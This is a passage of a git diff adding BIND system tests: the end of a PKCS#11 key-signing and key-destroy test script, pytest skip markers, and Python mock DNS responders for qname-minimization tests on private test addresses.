-v ';' "ns1/$alg.zsk") + + cat > "upd.cmd.ZSK.$alg" <<EOF +server 10.53.0.1 $PORT +ttl 300 +zone $alg.example. +update add $new_zsk +send +EOF + + $NSUPDATE -v > "upd.log.ZSK.$alg" < "upd.cmd.ZSK.$alg" || ret=1 + + retry_quiet 20 dig_for_rr "$alg" "SOA" "$countSOA0" || ret=1 + test_done + + echo_i "testing inline signing with new PKCS#11 KSK ($alg)" + + dig_with_opts "$alg.example." @10.53.0.1 "DNSKEY" > "dig.out.DNSKEY.$alg.0" || ret=1 + countDNSKEY0=$(count_rrsigs "dig.out.DNSKEY.$alg.0") + new_ksk=$(grep -v ';' "ns1/$alg.ksk") + + cat > "upd.cmd.KSK.$alg" <<EOF +server 10.53.0.1 $PORT +ttl 300 +zone $alg.example. +update add $new_ksk +send +EOF + + $NSUPDATE -v > "upd.log.KSK.$alg" < "upd.cmd.KSK.$alg" || ret=1 + + retry_quiet 20 dig_for_rr "$alg" "DNSKEY" "$countDNSKEY0" || ret=1 + test_done + + echo_i "testing PKCS#11 key destroy ($alg)" + + # Lookup all existing keys + echo_i "looking up all existing keys ($alg)" + $PK11LIST > "pkcs11-list.out.id.$alg" || ret=1 + test_done + + echo_i "destroying key with 'pkcs11-$alg-ksk1' label ($alg)" + $PK11DEL -l "pkcs11-$alg-ksk1" > /dev/null 2>&1 || ret=1 + test_done + + echo_i "destroying key with 'pkcs11-$alg-zsk1' label ($alg)" + $PK11DEL -l "pkcs11-$alg-zsk1" > /dev/null 2>&1 || ret=1 + test_done + + id=$(awk -v label="'pkcs11-$alg-ksk2'" '{ if ($7 == label) { print $9; exit; } }' < "pkcs11-list.out.id.$alg") + echo_i "destroying key with $id id ($alg)" + if [ -n "$id" ]; then + $PK11DEL -i "$id" > /dev/null 2>&1 || ret=1 + else + ret=1 + fi + test_done + + id=$(awk -v label="'pkcs11-$alg-zsk2'" '{ if ($7 == label) { print $9; exit; } }' < "pkcs11-list.out.id.$alg") + echo_i "destroying key with $id id ($alg)" + if [ -n "$id" ]; then + $PK11DEL -i "$id" > /dev/null 2>&1 || ret=1 + else + ret=1 + fi + test_done + + echo_i "checking if all keys have been destroyed ($alg)" + $PK11LIST > "pkcs11-list.out.$alg" || ret=1 + count=$(grep -c "pkcs11-$alg-[kz]sk[0-9]*" "pkcs11-list.out.$alg" || true) + [ "$count" -eq 0 ] || ret=1 + test_done + n=$((n+1)) +done < supported + +echo_i "Checking if all supported algorithms were tested" +[ "$n" -eq "$(wc -l < supported)" ] || ret=1 +test_done + +echo_i "Checking for assertion failure in pk11_numbits()" +$PERL ../packet.pl -a "10.53.0.1" -p "$PORT" -t udp 2037-pk11_numbits-crash-test.pkt +dig_with_opts @10.53.0.1 version.bind. CH TXT > dig.out.pk11_numbits || ret=1 +test_done + +echo_i "exit status: $status" +[ "$status" -eq 0 ] || exit 1 diff --git a/bin/tests/system/pkcs11/usepkcs11 b/bin/tests/system/pkcs11/usepkcs11 new file mode 100644 index 0000000..ef46412 --- /dev/null +++ b/bin/tests/system/pkcs11/usepkcs11 @@ -0,0 +1 @@ +This test relies on PKCS#11! diff --git a/bin/tests/system/pytest_custom_markers.py b/bin/tests/system/pytest_custom_markers.py new file mode 100644 index 0000000..ba3a9d4 --- /dev/null +++ b/bin/tests/system/pytest_custom_markers.py @@ -0,0 +1,60 @@ +#!/usr/bin/python3 + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +import os +import subprocess + +import pytest + + +long_test = pytest.mark.skipif( + not os.environ.get("CI_ENABLE_ALL_TESTS"), reason="CI_ENABLE_ALL_TESTS not set" +) + + +def feature_test(feature): + feature_test_bin = os.environ["FEATURETEST"] + try: + subprocess.run([feature_test_bin, feature], check=True) + except subprocess.CalledProcessError as exc: + if exc.returncode != 1: + raise + return False + return True + + +have_libxml2 = pytest.mark.skipif( + not feature_test("--have-libxml2"), reason="libxml2 support disabled in the build" +) + +have_json_c = pytest.mark.skipif( + not feature_test("--have-json-c"), reason="json-c support disabled in the build" +) + + +try: + import flaky as flaky_pkg +except ModuleNotFoundError: + # In case the flaky package is not installed, run the tests as usual + # without any attempts to re-run them. + # pylint: disable=unused-argument + def flaky(*args, **kwargs): + """Mock decorator that doesn't do anything special, just returns the function.""" + + def wrapper(wrapped_obj): + return wrapped_obj + + return wrapper + +else: + flaky = flaky_pkg.flaky diff --git a/bin/tests/system/qmin/ans2/ans.py b/bin/tests/system/qmin/ans2/ans.py new file mode 100755 index 0000000..1994ff3 --- /dev/null +++ b/bin/tests/system/qmin/ans2/ans.py @@ -0,0 +1,401 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +from __future__ import print_function +import os +import sys +import signal +import socket +import select +from datetime import datetime, timedelta +import time +import functools + +import dns, dns.message, dns.query, dns.flags +from dns.rdatatype import * +from dns.rdataclass import * +from dns.rcode import * +from dns.name import * + + +# Log query to file +def logquery(type, qname): + with open("qlog", "a") as f: + f.write("%s %s\n", type, qname) + + +def endswith(domain, labels): + return domain.endswith("." + labels) or domain == labels + + +############################################################################ +# Respond to a DNS query. +# For good. it serves: +# ns2.good. IN A 10.53.0.2 +# zoop.boing.good. NS ns3.good. +# ns3.good. IN A 10.53.0.3 +# too.many.labels.a.b.c.d.e.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.good. A 192.0.2.2 +# it responds properly (with NODATA empty response) to non-empty terminals +# +# For slow. it works the same as for good., but each response is delayed by 400 milliseconds +# +# For bad. it works the same as for good., but returns NXDOMAIN to non-empty terminals +# +# For ugly. it works the same as for good., but returns garbage to non-empty terminals +# +# For 1.0.0.2.ip6.arpa it serves +# 1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.f.4.0.1.0.0.2.ip6.arpa. IN PTR nee.com. +# 8.2.6.0.1.0.0.2.ip6.arpa IN NS ns3.good +# 1.0.0.2.ip6.arpa. IN NS ns2.good +# ip6.arpa. IN NS ns2.good +# +# For stale. it serves: +# a.b. NS ns.a.b.stale. +# ns.a.b.stale. IN A 10.53.0.3 +# b. NS ns.b.stale. +# ns.b.stale. IN A 10.53.0.4 +############################################################################ +def create_response(msg): + m = dns.message.from_wire(msg) + qname = m.question[0].name.to_text() + lqname = qname.lower() + labels = lqname.split(".") + + # get qtype + rrtype = m.question[0].rdtype + typename = dns.rdatatype.to_text(rrtype) + if typename == "A" or typename == "AAAA": + typename = "ADDR" + bad = False + ugly = False + slow = False + + # log this query + with open("query.log", "a") as f: + f.write("%s %s\n" % (typename, lqname)) + print("%s %s" % (typename, lqname), end=" ") + + r = dns.message.make_response(m) + r.set_rcode(NOERROR) + + if endswith(lqname, "1.0.0.2.ip6.arpa."): + # Direct query - give direct answer + if endswith(lqname, "8.2.6.0.1.0.0.2.ip6.arpa."): + # Delegate to ns3 + r.authority.append( + dns.rrset.from_text( + "8.2.6.0.1.0.0.2.ip6.arpa.", 60, IN, NS, "ns3.good." + ) + ) + r.additional.append( + dns.rrset.from_text("ns3.good.", 60, IN, A, "10.53.0.3") + ) + elif ( + lqname + == "1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.f.4.0.1.0.0.2.ip6.arpa." + and rrtype == PTR + ): + # Direct query - give direct answer + r.answer.append( + dns.rrset.from_text( + "1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.f.4.0.1.0.0.2.ip6.arpa.", + 1, + IN, + PTR, + "nee.com.", + ) + ) + r.flags |= dns.flags.AA + elif lqname == "1.0.0.2.ip6.arpa." and rrtype == NS: + # NS query at the apex + r.answer.append( + dns.rrset.from_text("1.0.0.2.ip6.arpa.", 30, IN, NS, "ns2.good.") + ) + r.flags |= dns.flags.AA + elif endswith( + "1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.f.4.0.1.0.0.2.ip6.arpa.", + lqname, + ): + # NODATA answer + r.authority.append( + dns.rrset.from_text( + "1.0.0.2.ip6.arpa.", + 30, + IN, + SOA, + "ns2.good. hostmaster.arpa. 2018050100 1 1 1 1", + ) + ) + else: + # NXDOMAIN + r.authority.append( + dns.rrset.from_text( + "1.0.0.2.ip6.arpa.", + 30, + IN, + SOA, + "ns2.good. hostmaster.arpa. 2018050100 1 1 1 1", + ) + ) + r.set_rcode(NXDOMAIN) + return r + elif endswith(lqname, "ip6.arpa."): + if lqname == "ip6.arpa." and rrtype == NS: + # NS query at the apex + r.answer.append(dns.rrset.from_text("ip6.arpa.", 30, IN, NS, "ns2.good.")) + r.flags |= dns.flags.AA + elif endswith("1.0.0.2.ip6.arpa.", lqname): + # NODATA answer + r.authority.append( + dns.rrset.from_text( + "ip6.arpa.", + 30, + IN, + SOA, + "ns2.good. hostmaster.arpa. 2018050100 1 1 1 1", + ) + ) + else: + # NXDOMAIN + r.authority.append( + dns.rrset.from_text( + "ip6.arpa.", + 30, + IN, + SOA, + "ns2.good. hostmaster.arpa. 2018050100 1 1 1 1", + ) + ) + r.set_rcode(NXDOMAIN) + return r + elif endswith(lqname, "stale."): + if endswith(lqname, "a.b.stale."): + # Delegate to ns.a.b.stale. + r.authority.append( + dns.rrset.from_text("a.b.stale.", 2, IN, NS, "ns.a.b.stale.") + ) + r.additional.append( + dns.rrset.from_text("ns.a.b.stale.", 2, IN, A, "10.53.0.3") + ) + elif endswith(lqname, "b.stale."): + # Delegate to ns.b.stale. + r.authority.append( + dns.rrset.from_text("b.stale.", 2, IN, NS, "ns.b.stale.") + ) + r.additional.append( + dns.rrset.from_text("ns.b.stale.", 2, IN, A, "10.53.0.4") + ) + elif lqname == "stale." and rrtype == NS: + # NS query at the apex. + r.answer.append(dns.rrset.from_text("stale.", 2, IN, NS, "ns2.stale.")) + r.flags |= dns.flags.AA + elif lqname == "stale." and rrtype == SOA: + # SOA query at the apex. + r.answer.append( + dns.rrset.from_text( + "stale.", 2, IN, SOA, "ns2.stale. hostmaster.stale. 1 2 3 4 5" + ) + ) + r.flags |= dns.flags.AA + elif lqname == "stale.": + # NODATA answer + r.authority.append( + dns.rrset.from_text( + "stale.", 2, IN, SOA, "ns2.stale. hostmaster.arpa. 1 2 3 4 5" + ) + ) + else: + # NXDOMAIN + r.authority.append( + dns.rrset.from_text( + "stale.", 2, IN, SOA, "ns2.stale. hostmaster.arpa. 1 2 3 4 5" + ) + ) + r.set_rcode(NXDOMAIN) + return r + elif endswith(lqname, "bad."): + bad = True + suffix = "bad." + lqname = lqname[:-4] + elif endswith(lqname, "ugly."): + ugly = True + suffix = "ugly." + lqname = lqname[:-5] + elif endswith(lqname, "good."): + suffix = "good." + lqname = lqname[:-5] + elif endswith(lqname, "slow."): + slow = True + suffix = "slow." + lqname = lqname[:-5] + elif endswith(lqname, "fwd."): + suffix = "fwd." + lqname = lqname[:-4] + else: + r.set_rcode(REFUSED) + return r + + # Good/bad/ugly differs only in how we treat non-empty terminals + if endswith(lqname, "zoop.boing."): + r.authority.append( + dns.rrset.from_text("zoop.boing." + suffix, 1, IN, NS, "ns3." + suffix) + ) + elif ( + lqname == "many.labels.a.b.c.d.e.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z." + and rrtype == A + ): + r.answer.append(dns.rrset.from_text(lqname + suffix, 1, IN, A, "192.0.2.2")) + r.flags |= dns.flags.AA + elif lqname == "" and rrtype == NS: + r.answer.append(dns.rrset.from_text(suffix, 30, IN, NS, "ns2." + suffix)) + r.flags |= dns.flags.AA + elif lqname == "ns2." and rrtype == A: + r.answer.append(dns.rrset.from_text("ns2." + suffix, 30, IN, A, "10.53.0.2")) + r.flags |= dns.flags.AA + elif lqname == "ns2." and rrtype == AAAA: + r.answer.append( + dns.rrset.from_text("ns2." + suffix, 30, IN, AAAA, "fd92:7065:b8e:ffff::2") + ) + r.flags |= dns.flags.AA + elif lqname == "ns3." and rrtype == A: + r.answer.append(dns.rrset.from_text("ns3." + suffix, 30, IN, A, "10.53.0.3")) + r.flags |= dns.flags.AA + elif lqname == "ns3." and rrtype == AAAA: + r.answer.append( + dns.rrset.from_text("ns3." + suffix, 30, IN, AAAA, "fd92:7065:b8e:ffff::3") + ) + r.flags |= dns.flags.AA + elif lqname == "ns4." and rrtype == A: + r.answer.append(dns.rrset.from_text("ns4." + suffix, 30, IN, A, "10.53.0.4")) + r.flags |= dns.flags.AA + elif lqname == "ns4." and rrtype == AAAA: + r.answer.append( + dns.rrset.from_text("ns4." + suffix, 30, IN, AAAA, "fd92:7065:b8e:ffff::4") + ) + r.flags |= dns.flags.AA + elif lqname == "a.bit.longer.ns.name." and rrtype == A: + r.answer.append( + dns.rrset.from_text("a.bit.longer.ns.name." + suffix, 1, IN, A, "10.53.0.4") + ) + r.flags |= dns.flags.AA + elif lqname == "a.bit.longer.ns.name." and rrtype == AAAA: + r.answer.append( + dns.rrset.from_text( + "a.bit.longer.ns.name." + suffix, 1, IN, AAAA, "fd92:7065:b8e:ffff::4" + ) + ) + r.flags |= dns.flags.AA + else: + r.authority.append( + dns.rrset.from_text( + suffix, + 1, + IN, + SOA, + "ns2." + suffix + " hostmaster.arpa. 2018050100 1 1 1 1", + ) + ) + if bad or not ( + endswith("icky.icky.icky.ptang.zoop.boing.", lqname) + or endswith( + "many.labels.a.b.c.d.e.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.", + lqname, + ) + or endswith("a.bit.longer.ns.name.", lqname) + ): + r.set_rcode(NXDOMAIN) + if ugly: + r.set_rcode(FORMERR) + if slow: + time.sleep(0.2) + return r + + +def sigterm(signum, frame): + print("Shutting down now...") + os.remove("ans.pid") + running = False + sys.exit(0) + + +############################################################################ +# Main +# +# Set up responder and control channel, open the pid file, and start +# the main loop, listening for queries on the query channel or commands +# on the control channel and acting on them. +############################################################################ +ip4 = "10.53.0.2" +ip6 = "fd92:7065:b8e:ffff::2" + +try: + port = int(os.environ["PORT"]) +except: + port = 5300 + +query4_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +query4_socket.bind((ip4, port)) + +havev6 = True +try: + query6_socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) + try: + query6_socket.bind((ip6, port)) + except: + query6_socket.close() + havev6 = False +except: + havev6 = False + +signal.signal(signal.SIGTERM, sigterm) + +f = open("ans.pid", "w") +pid = os.getpid() +print(pid, file=f) +f.close() + +running = True + +print("Listening on %s port %d" % (ip4, port)) +if havev6: + print("Listening on %s port %d" % (ip6, port)) +print("Ctrl-c to quit") + +if havev6: + input = [query4_socket, query6_socket] +else: + input = [query4_socket] + +while running: + try: + inputready, outputready, exceptready = select.select(input, [], []) + except select.error as e: + break + except socket.error as e: + break + except KeyboardInterrupt: + break + + for s in inputready: + if s == query4_socket or s == query6_socket: + print( + "Query received on %s" % (ip4 if s == query4_socket else ip6), end=" " + ) + # Handle incoming queries + msg = s.recvfrom(65535) + rsp = create_response(msg[0]) + if rsp: + print(dns.rcode.to_text(rsp.rcode())) + s.sendto(rsp.to_wire(), msg[1]) + else: + print("NO RESPONSE") + if not running: + break diff --git a/bin/tests/system/qmin/ans3/ans.py b/bin/tests/system/qmin/ans3/ans.py new file mode 100755 index 0000000..079c3d2 --- /dev/null +++ b/bin/tests/system/qmin/ans3/ans.py @@ -0,0 +1,274 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +from __future__ import print_function +import os +import sys +import signal +import socket +import select +from datetime import datetime, timedelta +import time +import functools + +import dns, dns.message, dns.query, dns.flags +from dns.rdatatype import * +from dns.rdataclass import * +from dns.rcode import * +from dns.name import * + + +# Log query to file +def logquery(type, qname): + with open("qlog", "a") as f: + f.write("%s %s\n", type, qname) + + +def endswith(domain, labels): + return domain.endswith("." + labels) or domain == labels + + +############################################################################ +# Respond to a DNS query. +# For good. it serves: +# zoop.boing.good. NS ns3.good. +# icky.ptang.zoop.boing.good. NS a.bit.longer.ns.name.good. +# it responds properly (with NODATA empty response) to non-empty terminals +# +# For slow. it works the same as for good., but each response is delayed by 400 milliseconds +# +# For bad. it works the same as for good., but returns NXDOMAIN to non-empty terminals +# +# For ugly. it works the same as for good., but returns garbage to non-empty terminals +# +# For stale. it serves: +# a.b.stale. IN TXT peekaboo (resolver did not do qname minimization) +############################################################################ +def create_response(msg): + m = dns.message.from_wire(msg) + qname = m.question[0].name.to_text() + lqname = qname.lower() + labels = lqname.split(".") + suffix = "" + + # get qtype + rrtype = m.question[0].rdtype + typename = dns.rdatatype.to_text(rrtype) + if typename == "A" or typename == "AAAA": + typename = "ADDR" + bad = False + ugly = False + slow = False + + # log this query + with open("query.log", "a") as f: + f.write("%s %s\n" % (typename, lqname)) + print("%s %s" % (typename, lqname), end=" ") + + r = dns.message.make_response(m) + r.set_rcode(NOERROR) + + ip6req = False + + if endswith(lqname, "bad."): + bad = True + suffix = "bad." + lqname = lqname[:-4] + elif endswith(lqname, "ugly."): + ugly = True + suffix = "ugly." + lqname = lqname[:-5] + elif endswith(lqname, "good."): + suffix = "good." + lqname = lqname[:-5] + elif endswith(lqname, "slow."): + slow = True + suffix = "slow." + lqname = lqname[:-5] + elif endswith(lqname, "8.2.6.0.1.0.0.2.ip6.arpa."): + ip6req = True + elif endswith(lqname, "a.b.stale."): + if lqname == "a.b.stale.": + if rrtype == TXT: + # Direct query. + r.answer.append(dns.rrset.from_text(lqname, 1, IN, TXT, "peekaboo")) + r.flags |= dns.flags.AA + elif rrtype == NS: + # NS a.b. + r.answer.append(dns.rrset.from_text(lqname, 1, IN, NS, "ns.a.b.stale.")) + r.additional.append( + dns.rrset.from_text("ns.a.b.stale.", 1, IN, A, "10.53.0.3") + ) + r.flags |= dns.flags.AA + elif rrtype == SOA: + # SOA a.b. + r.answer.append( + dns.rrset.from_text( + lqname, 1, IN, SOA, "a.b.stale. hostmaster.a.b.stale. 1 2 3 4 5" + ) + ) + r.flags |= dns.flags.AA + else: + # NODATA. + r.authority.append( + dns.rrset.from_text( + lqname, 1, IN, SOA, "a.b.stale. hostmaster.a.b.stale. 1 2 3 4 5" + ) + ) + else: + r.authority.append( + dns.rrset.from_text( + lqname, 1, IN, SOA, "a.b.stale. hostmaster.a.b.stale. 1 2 3 4 5" + ) + ) + r.set_rcode(NXDOMAIN) + # NXDOMAIN. + return r + else: + r.set_rcode(REFUSED) + return r + + # Good/bad differs only in how we treat non-empty terminals + if lqname == "zoop.boing." and rrtype == NS: + r.answer.append( + dns.rrset.from_text(lqname + suffix, 1, IN, NS, "ns3." + suffix) + ) + r.flags |= dns.flags.AA + elif endswith(lqname, "icky.ptang.zoop.boing."): + r.authority.append( + dns.rrset.from_text( + "icky.ptang.zoop.boing." + suffix, + 1, + IN, + NS, + "a.bit.longer.ns.name." + suffix, + ) + ) + elif endswith("icky.ptang.zoop.boing.", lqname): + r.authority.append( + dns.rrset.from_text( + "zoop.boing." + suffix, + 1, + IN, + SOA, + "ns3." + suffix + " hostmaster.arpa. 2018050100 1 1 1 1", + ) + ) + if bad: + r.set_rcode(NXDOMAIN) + if ugly: + r.set_rcode(FORMERR) + elif endswith(lqname, "zoop.boing."): + r.authority.append( + dns.rrset.from_text( + "zoop.boing." + suffix, + 1, + IN, + SOA, + "ns3." + suffix + " hostmaster.arpa. 2018050100 1 1 1 1", + ) + ) + r.set_rcode(NXDOMAIN) + elif ip6req: + r.authority.append( + dns.rrset.from_text( + "1.1.1.1.8.2.6.0.1.0.0.2.ip6.arpa.", 60, IN, NS, "ns4.good." + ) + ) + r.additional.append(dns.rrset.from_text("ns4.good.", 60, IN, A, "10.53.0.4")) + else: + r.set_rcode(REFUSED) + + if slow: + time.sleep(0.4) + return r + + +def sigterm(signum, frame): + print("Shutting down now...") + os.remove("ans.pid") + running = False + sys.exit(0) + + +############################################################################ +# Main +# +# Set up responder and control channel, open the pid file, and start +# the main loop, listening for queries on the query channel or commands +# on the control channel and acting on them. +############################################################################ +ip4 = "10.53.0.3" +ip6 = "fd92:7065:b8e:ffff::3" + +try: + port = int(os.environ["PORT"]) +except: + port = 5300 + +query4_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +query4_socket.bind((ip4, port)) + +havev6 = True +try: + query6_socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) + try: + query6_socket.bind((ip6, port)) + except: + query6_socket.close() + havev6 = False +except: + havev6 = False + +signal.signal(signal.SIGTERM, sigterm) + +f = open("ans.pid", "w") +pid = os.getpid() +print(pid, file=f) +f.close() + +running = True + +print("Listening on %s port %d" % (ip4, port)) +if havev6: + print("Listening on %s port %d" % (ip6, port)) +print("Ctrl-c to quit") + +if havev6: + input = [query4_socket, query6_socket] +else: + input = [query4_socket] + +while running: + try: + inputready, outputready, exceptready = select.select(input, [], []) + except select.error as e: + break + except socket.error as e: + break + except KeyboardInterrupt: + break + + for s in inputready: + if s == query4_socket or s == query6_socket: + print( + "Query received on %s" % (ip4 if s == query4_socket else ip6), end=" " + ) + # Handle incoming queries + msg = s.recvfrom(65535) + rsp = create_response(msg[0]) + if rsp: + print(dns.rcode.to_text(rsp.rcode())) + s.sendto(rsp.to_wire(), msg[1]) + else: + print("NO RESPONSE") + if not running: + break diff --git a/bin/tests/system/qmin/ans4/ans.py b/bin/tests/system/qmin/ans4/ans.py new file mode 100755 index 0000000..f3d00c3 --- /dev/null +++ b/bin/tests/system/qmin/ans4/ans.py @@ -0,0 +1,320 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +from __future__ import print_function +import os +import sys +import signal +import socket +import select +from datetime import datetime, timedelta +import time +import functools + +import dns, dns.message, dns.query, dns.flags +from dns.rdatatype import * +from dns.rdataclass import * +from dns.rcode import * +from dns.name import * + + +# Log query to file +def logquery(type, qname): + with open("qlog", "a") as f: + f.write("%s %s\n", type, qname) + + +def endswith(domain, labels): + return domain.endswith("." + labels) or domain == labels + + +############################################################################ +# Respond to a DNS query. +# For good. it serves: +# icky.ptang.zoop.boing.good. NS a.bit.longer.ns.name. +# icky.icky.icky.ptang.zoop.boing.good. A 192.0.2.1 +# more.icky.icky.icky.ptang.zoop.boing.good. A 192.0.2.2 +# it responds properly (with NODATA empty response) to non-empty terminals +# +# For slow. it works the same as for good., but each response is delayed by 400 milliseconds +# +# For bad. it works the same as for good., but returns NXDOMAIN to non-empty terminals +# +# For ugly. it works the same as for good., but returns garbage to non-empty terminals +# +# For stale. it serves: +# a.b.stale. IN TXT hooray (resolver did do qname minimization) +############################################################################ +def create_response(msg): + m = dns.message.from_wire(msg) + qname = m.question[0].name.to_text() + lqname = qname.lower() + labels = lqname.split(".") + suffix = "" + + # get qtype + rrtype = m.question[0].rdtype + typename = dns.rdatatype.to_text(rrtype) + if typename == "A" or typename == "AAAA": + typename = "ADDR" + bad = False + slow = False + ugly = False + + # log this query + with open("query.log", "a") as f: + f.write("%s %s\n" % (typename, lqname)) + print("%s %s" % (typename, lqname), end=" ") + + r = dns.message.make_response(m) + r.set_rcode(NOERROR) + + ip6req = False + + if endswith(lqname, "bad."): + bad = True + suffix = "bad." + lqname = lqname[:-4] + elif endswith(lqname, "ugly."): + ugly = True + suffix = "ugly." + lqname = lqname[:-5] + elif endswith(lqname, "good."): + suffix = "good." + lqname = lqname[:-5] + elif endswith(lqname, "slow."): + slow = True + suffix = "slow." + lqname = lqname[:-5] + elif endswith(lqname, "1.1.1.1.8.2.6.0.1.0.0.2.ip6.arpa."): + ip6req = True + elif endswith(lqname, "b.stale."): + if lqname == "a.b.stale.": + if rrtype == TXT: + # Direct query. + r.answer.append(dns.rrset.from_text(lqname, 1, IN, TXT, "hooray")) + r.flags |= dns.flags.AA + elif rrtype == NS: + # NS a.b. + r.answer.append(dns.rrset.from_text(lqname, 1, IN, NS, "ns.a.b.stale.")) + r.additional.append( + dns.rrset.from_text("ns.a.b.stale.", 1, IN, A, "10.53.0.3") + ) + r.flags |= dns.flags.AA + elif rrtype == SOA: + # SOA a.b. + r.answer.append( + dns.rrset.from_text( + lqname, 1, IN, SOA, "a.b.stale. hostmaster.a.b.stale. 1 2 3 4 5" + ) + ) + r.flags |= dns.flags.AA + else: + # NODATA. + r.authority.append( + dns.rrset.from_text( + lqname, 1, IN, SOA, "a.b.stale. hostmaster.a.b.stale. 1 2 3 4 5" + ) + ) + elif lqname == "b.stale.": + if rrtype == NS: + # NS b. + r.answer.append(dns.rrset.from_text(lqname, 1, IN, NS, "ns.b.stale.")) + r.additional.append( + dns.rrset.from_text("ns.b.stale.", 1, IN, A, "10.53.0.4") + ) + r.flags |= dns.flags.AA + elif rrtype == SOA: + # SOA b. + r.answer.append( + dns.rrset.from_text( + lqname, 1, IN, SOA, "b.stale. hostmaster.b.stale. 1 2 3 4 5" + ) + ) + r.flags |= dns.flags.AA + else: + # NODATA. + r.authority.append( + dns.rrset.from_text( + lqname, 1, IN, SOA, "b.stale. hostmaster.b.stale. 1 2 3 4 5" + ) + ) + else: + r.authority.append( + dns.rrset.from_text( + lqname, 1, IN, SOA, "b.stale. hostmaster.b.stale. 1 2 3 4 5" + ) + ) + r.set_rcode(NXDOMAIN) + # NXDOMAIN. + return r + else: + r.set_rcode(REFUSED) + return r + + # Good/bad differs only in how we treat non-empty terminals + if lqname == "icky.icky.icky.ptang.zoop.boing." and rrtype == A: + r.answer.append(dns.rrset.from_text(lqname + suffix, 1, IN, A, "192.0.2.1")) + r.flags |= dns.flags.AA + elif lqname == "more.icky.icky.icky.ptang.zoop.boing." and rrtype == A: + r.answer.append(dns.rrset.from_text(lqname + suffix, 1, IN, A, "192.0.2.2")) + r.flags |= dns.flags.AA + elif lqname == "icky.ptang.zoop.boing." and rrtype == NS: + r.answer.append( + dns.rrset.from_text( + lqname + suffix, 1, IN, NS, "a.bit.longer.ns.name." + suffix + ) + ) + r.flags |= dns.flags.AA + elif endswith(lqname, "icky.ptang.zoop.boing."): + r.authority.append( + dns.rrset.from_text( + "icky.ptang.zoop.boing." + suffix, + 1, + IN, + SOA, + "ns2." + suffix + " hostmaster.arpa. 2018050100 1 1 1 1", + ) + ) + if bad or not endswith("more.icky.icky.icky.ptang.zoop.boing.", lqname): + r.set_rcode(NXDOMAIN) + if ugly: + r.set_rcode(FORMERR) + elif ip6req: + r.flags |= dns.flags.AA + if ( + lqname + == "test1.test2.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.9.0.9.4.1.1.1.1.8.2.6.0.1.0.0.2.ip6.arpa." + and rrtype == TXT + ): + r.answer.append( + dns.rrset.from_text( + "test1.test2.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.9.0.9.4.1.1.1.1.8.2.6.0.1.0.0.2.ip6.arpa.", + 1, + IN, + TXT, + "long_ip6_name", + ) + ) + elif endswith( + "0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.9.0.9.4.1.1.1.1.8.2.6.0.1.0.0.2.ip6.arpa.", + lqname, + ): + # NODATA answer + r.authority.append( + dns.rrset.from_text( + "1.1.1.1.8.2.6.0.1.0.0.2.ip6.arpa.", + 60, + IN, + SOA, + "ns4.good. hostmaster.arpa. 2018050100 120 30 320 16", + ) + ) + else: + # NXDOMAIN + r.authority.append( + dns.rrset.from_text( + "1.1.1.1.8.2.6.0.1.0.0.2.ip6.arpa.", + 60, + IN, + SOA, + "ns4.good. hostmaster.arpa. 2018050100 120 30 320 16", + ) + ) + r.set_rcode(NXDOMAIN) + else: + r.set_rcode(REFUSED) + + if slow: + time.sleep(0.4) + return r + + +def sigterm(signum, frame): + print("Shutting down now...") + os.remove("ans.pid") + running = False + sys.exit(0) + + +############################################################################ +# Main +# +# Set up responder and control channel, open the pid file, and start +# the main loop, listening for queries on the query channel or commands +# on the control channel and acting on them. +############################################################################ +ip4 = "10.53.0.4" +ip6 = "fd92:7065:b8e:ffff::4" + +try: + port = int(os.environ["PORT"]) +except: + port = 5300 + +query4_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +query4_socket.bind((ip4, port)) + +havev6 = True +try: + query6_socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) + try: + query6_socket.bind((ip6, port)) + except: + query6_socket.close() + havev6 = False +except: + havev6 = False + +signal.signal(signal.SIGTERM, sigterm) + +f = open("ans.pid", "w") +pid = os.getpid() +print(pid, file=f) +f.close() + +running = True + +print("Listening on %s port %d" % (ip4, port)) +if havev6: + print("Listening on %s port %d" % (ip6, port)) +print("Ctrl-c to quit") + +if havev6: + input = [query4_socket, query6_socket] +else: + input = [query4_socket] + +while running: + try: + inputready, outputready, exceptready = select.select(input, [], []) + except select.error as e: + break + except socket.error as e: + break + 